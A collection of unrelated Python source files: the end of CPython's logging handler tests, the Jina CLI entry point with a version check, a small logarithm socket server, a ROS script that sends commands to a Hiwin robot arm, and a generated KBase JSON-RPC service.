dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
def test_compute_rollover_daily_attime(self):
currentTime = 0
atTime = datetime.time(12, 0, 0)
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='MIDNIGHT', interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
actual = rh.computeRollover(currentTime)
self.assertEqual(actual, currentTime + 12 * 60 * 60)
actual = rh.computeRollover(currentTime + 13 * 60 * 60)
self.assertEqual(actual, currentTime + 36 * 60 * 60)
finally:
rh.close()
#@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
def test_compute_rollover_weekly_attime(self):
currentTime = int(time.time())
today = currentTime - currentTime % 86400
atTime = datetime.time(12, 0, 0)
wday = time.gmtime(today).tm_wday
for day in range(7):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='W%d' % day, interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
if wday > day:
# The rollover day has already passed this week, so we
# go over into next week
expected = (7 - wday + day)
else:
expected = (day - wday)
# At this point expected is in days from now, convert to seconds
expected *= 24 * 60 * 60
# Add in the rollover time
expected += 12 * 60 * 60
# Add in adjustment for today
expected += today
actual = rh.computeRollover(today)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
if day == wday:
# goes into following week
expected += 7 * 24 * 60 * 60
actual = rh.computeRollover(today + 13 * 60 * 60)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
finally:
rh.close()
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
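# Worked example for the 'W0' expectation above (editor's illustrative sketch, not
# part of the original test suite): the epoch, 1970-01-01 00:00 UTC, is a Thursday.
# The handler first rolls forward to the next midnight (24 hours) and then waits
# four more days, so the first W0 (Monday) rollover lands on the midnight that
# closes Monday 1970-01-05, i.e. 432000 seconds after the epoch -- exactly
# secs(days=4, hours=24).
def _w0_rollover_worked_example():
    expected = datetime.timedelta(days=4, hours=24) // datetime.timedelta(seconds=1)
    assert expected == 5 * 24 * 60 * 60 == 432000
    return expected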
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil/pywintypes required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
try:
h = logging.handlers.NTEventLogHandler('test_logging')
except pywintypes.error as e:
if e.winerror == 5: # access denied
raise unittest.SkipTest('Insufficient privileges to run test')
raise
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
# Now see if the event is recorded
self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
blacklist = {'logThreads', 'logMultiprocessing',
'logProcesses', 'currentframe',
'PercentStyle', 'StrFormatStyle', 'StringTemplateStyle',
'Filterer', 'PlaceHolder', 'Manager', 'RootLogger',
'root', 'threading'}
support.check__all__(self, logging, blacklist=blacklist)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@support.run_with_locale('LC_ALL', '')
def test_main():
tests = [
BuiltinLevelsTest, BasicFilterTest, CustomLevelsAndFiltersTest,
HandlerTest, MemoryHandlerTest, ConfigFileTest, SocketHandlerTest,
DatagramHandlerTest, MemoryTest, EncodingTest, WarningsTest,
ConfigDictTest, ManagerTest, FormatterTest, BufferingFormatterTest,
StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest,
QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest, BasicConfigTest,
LoggerAdapterTest, LoggerTest, SMTPHandlerTest, FileHandlerTest,
RotatingFileHandlerTest, LastResortTest, LogRecordTest,
ExceptionTest, SysLogHandlerTest, IPv6SysLogHandlerTest, HTTPHandlerTest,
NTEventLogHandlerTest, TimedRotatingFileHandlerTest,
UnixSocketHandlerTest, UnixDatagramHandlerTest, UnixSysLogHandlerTest,
MiscTestCase
]
if hasattr(logging.handlers, 'QueueListener'):
tests.append(QueueListenerTest)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
__init__.py
|
import os
import sys
def _get_run_args(print_args: bool = True):
from jina.helper import get_rich_console
from jina.parsers import get_main_parser
console = get_rich_console()
silent_print = {'help', 'hub'}
parser = get_main_parser()
if len(sys.argv) > 1:
from argparse import _StoreAction, _StoreTrueAction
from rich import box
from rich.table import Table
args, unknown = parser.parse_known_args()
if unknown:
from jina.helper import warn_unknown_args
unknown = list(filter(lambda x: x.startswith('--'), unknown))
warn_unknown_args(unknown)
if args.cli not in silent_print and print_args:
from jina import __resources_path__
p = parser._actions[-1].choices[sys.argv[1]]
default_args = {
a.dest: a.default
for a in p._actions
if isinstance(a, (_StoreAction, _StoreTrueAction))
}
with open(os.path.join(__resources_path__, 'jina.logo')) as fp:
logo_str = fp.read()
param_str = Table(title=None, box=box.ROUNDED, highlight=True)
param_str.add_column('')
param_str.add_column('Parameters', justify='right')
param_str.add_column('Value', justify='left')
for k, v in sorted(vars(args).items()):
sign = ' ' if default_args.get(k, None) == v else '🔧️'
param = k.replace('_', '-')
value = str(v)
style = None if default_args.get(k, None) == v else 'blue on yellow'
param_str.add_row(sign, param, value, style=style)
print(f'\n{logo_str}\n')
console.print(f'▶️ {" ".join(sys.argv)}', param_str)
return args
else:
parser.print_help()
exit()
def _quick_ac_lookup():
from cli.autocomplete import ac_table
if len(sys.argv) > 1:
if sys.argv[1] == 'commands':
for k in ac_table['commands']:
print(k)
exit()
elif sys.argv[1] == 'completions':
# search with the longest shared prefix
for j in range(len(sys.argv), 2, -1):
_input = ' '.join(sys.argv[2:j]).strip()
if _input in ac_table['completions']:
compl = ac_table['completions'][_input]
for k in compl:
if k not in sys.argv:
print(k)
break
exit()
def _is_latest_version(suppress_on_error=True):
try:
import json
import warnings
from urllib.request import Request, urlopen
from jina import __version__
req = Request(
'https://api.jina.ai/latest', headers={'User-Agent': 'Mozilla/5.0'}
)
with urlopen(
req, timeout=5
) as resp: # 'with' is important to close the resource after use
latest_ver = json.load(resp)['version']
from packaging.version import Version
latest_ver = Version(latest_ver)
cur_ver = Version(__version__)
if cur_ver < latest_ver:
from jina.logging.predefined import default_logger
default_logger.warning(
f'You are using Jina version {cur_ver}, however version {latest_ver} is available. '
f'You should consider upgrading via the "pip install --upgrade jina" command.'
)
return False
return True
except:
        # no network, too slow, or api.jina.ai is down
if not suppress_on_error:
raise
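# Editor's note -- illustrative sketch, not part of the original module: the update
# check above relies on packaging.version.Version, which compares release segments
# numerically rather than lexicographically (so 2.10.0 is newer than 2.9.1). The
# helper below is hypothetical and only demonstrates that comparison.
def _needs_upgrade_example(current='2.9.1', latest='2.10.0'):
    from packaging.version import Version
    return Version(current) < Version(latest)  # True for the defaults above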
def main():
"""The main entrypoint of the CLI """
_quick_ac_lookup()
from cli import api
args = _get_run_args()
# checking version info in another thread
import threading
threading.Thread(target=_is_latest_version, daemon=True).start()
getattr(api, args.cli.replace('-', '_'))(args)
|
log_server.py
|
import socket
import sys
import math
import lib.ProtocolUtils as protocolUtils
import threading as thread
def message_handler(conn, addr):
data = protocolUtils.MessageHandler(conn.recv(1024)).message_loads()
print("New operation in queue ", data[0], " ", data[2])
try:
val1 = float(data[0])
val2 = float(data[2])
except ValueError:
        result = "The operands must be numbers"
conn.send(result.encode())
raise
    result = str(math.log(val1, val2))  # logarithm of val1, using val2 as the base
conn.send(result.encode())
# Close the thread to save hardware.
# sys.exit()
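# Editor's note -- illustrative sketch, not part of the original server: the handler
# above evaluates math.log(val1, val2), i.e. the logarithm of the first operand with
# the second operand as the base. A quick sanity check of that semantics:
def _log_semantics_example():
    assert abs(math.log(8, 2) - 3.0) < 1e-9      # log base 2 of 8
    assert abs(math.log(1000, 10) - 3.0) < 1e-9  # log base 10 of 1000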
if __name__ == "__main__":
socket_instance = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket_instance.bind(('', 9996))
socket_instance.listen(10)
threads_list = []
print("Add Server running ...")
while True:
conn, addr = socket_instance.accept()
temp_thread = thread.Thread(target=message_handler, args=(conn, addr,))
threads_list.append(temp_thread)
temp_thread.start()
|
HiwinRA605_socket_ros_test_20190626100830.py
|
#!/usr/bin/env python3
# license removed for brevity
# Receive commands from the strategy side and forward them over a socket to the control-side computer
import socket
## multithreading
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
data = '0' # initial value of the transmitted data
Arm_feedback = 1 # assume the arm is busy
state_feedback = 0
NAME = 'socket_server'
client_response = 0 # initial value of the response counter
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
Socket_sent_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
        return  # PEP 479: raising StopIteration inside a generator raises RuntimeError on Python 3.7+
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
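# Editor's note -- illustrative usage sketch, not part of the original script: each
# case(...) call matches against the value handed to switch(), and an argument-less
# case() acts as the default branch. The function name below is hypothetical.
def _switch_usage_example(value):
    for case in switch(value):
        if case('ptp'):
            return 'point-to-point move'
        if case('line'):
            return 'linear move'
        if case():  # no arguments: default branch
            return 'unhandled action'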
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##----------socket sent data flag-------------
# def socket_client_sent_flag(Sent_flag):
# global sent_feedback
# rospy.wait_for_service('sent_flag')
# try:
# Sent_flag_client = rospy.ServiceProxy('sent_flag', sent_flag)
# sent_feedback = Sent_flag_client(Sent_flag)
# #pos_feedback_times = pos_feedback.response
# return sent_feedback
# except rospy.ServiceException as e:
# print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server side-------
def point_data(req): ## receive the pose data sent from the strategy side
global client_response,point_data_flag
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
point_data_flag = True
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req): ## receive the arm-mode data sent from the strategy side
global arm_mode_flag
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
arm_mode_flag = True
return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req): ## receive the speed-mode data sent from the strategy side
global speed_mode_flag
socket_cmd.Speedmode = int('%s'%req.Speedmode)
speed_mode_flag = True
return(1)
# def Grip_Mode(req): ## receive the gripper-action data sent from the strategy side
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ## create the server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
    rospy.spin() ## keep the service node alive until shutdown
##------------server side end-------
##----------socket packet transmission--------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data,Socket_sent_flag
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
    #start_input=int(input('Press 1 to start transmission, 3 to exit: ')) # prompt for the start command
start_input = 1
if start_input==1:
while 1:
            ##---------------socket transmission of arm commands-----------------
#if Arm_feedback == 0:
if Socket_sent_flag == True:
Socket_sent_flag = False
                #-------select mode--------
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
                    #-------set arm speed--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
                    #-------set arm delay time--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
                    #-------set arm rapid/safe speed mode--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
                socket_cmd.action = 5 ## switch back to the initial mode state
                s.send(data.encode('utf-8')) # send the encoded command string over the socket
                feedback_str = s.recv(1024)
                # the arm side reports its state
                if str(feedback_str[2]) == '70':# 'F': the arm is Ready and can accept the next motion command
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
                if str(feedback_str[2]) == '84':# 'T': the arm is busy and cannot execute the next motion command
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
                if str(feedback_str[2]) == '54':# '6': strategy finished
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
                # check the send flag
                if str(feedback_str[4]) == '48':# returns 0: false
                    Socket_sent_flag = False
                if str(feedback_str[4]) == '49':# returns 1: true
Socket_sent_flag = True
            ##---------------socket transmission of arm commands end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## multithreading
def thread_test():
socket_client()
## multithreading end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
    socket_cmd.action = 5 ## switch to the initial mode state
t = threading.Thread(target=thread_test)
    t.start() # start the client thread
socket_server()
t.join()
    # Ctrl+K Ctrl+C  Add line comment
    # Ctrl+K Ctrl+U  Remove line comment
    # Ctrl+] / Ctrl+[  Indent / outdent line
|
kb_cobrapyServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from kb_cobrapy.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_cobrapy'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_cobrapy.kb_cobrapyImpl import kb_cobrapy # noqa @IgnorePep8
impl_kb_cobrapy = kb_cobrapy(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
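# Editor's note -- illustrative sketch, not part of the generated server code:
# JSONObjectEncoder lets json.dumps handle values the stock encoder rejects, e.g.
# sets and frozensets are serialized as JSON lists.
def _json_object_encoder_example():
    return json.dumps({'ids': {3, 1, 2}}, cls=JSONObjectEncoder)  # e.g. '{"ids": [1, 2, 3]}'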
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
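# Editor's note -- illustrative sketch, not part of the generated server code: when
# the X-* headers are trusted (the default unless 'dont_trust_x_ip_headers' is set
# to 'true'), getIPAddress returns the first address in the X-Forwarded-For chain,
# otherwise it falls back to REMOTE_ADDR. The environ dict below is fabricated.
def _get_ip_address_example():
    fake_environ = {'HTTP_X_FORWARDED_FOR': '10.0.0.5, 192.168.0.1',
                    'REMOTE_ADDR': '127.0.0.1'}
    return getIPAddress(fake_environ)  # '10.0.0.5' when the X-* headers are trusted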
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_cobrapy'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_cobrapy.model_to_sbml_file,
name='kb_cobrapy.model_to_sbml_file',
types=[dict])
self.method_authentication['kb_cobrapy.model_to_sbml_file'] = 'required' # noqa
self.rpc_service.add(impl_kb_cobrapy.export_model_as_sbml,
name='kb_cobrapy.export_model_as_sbml',
types=[dict])
self.method_authentication['kb_cobrapy.export_model_as_sbml'] = 'required' # noqa
self.rpc_service.add(impl_kb_cobrapy.status,
name='kb_cobrapy.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_cobrapy ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
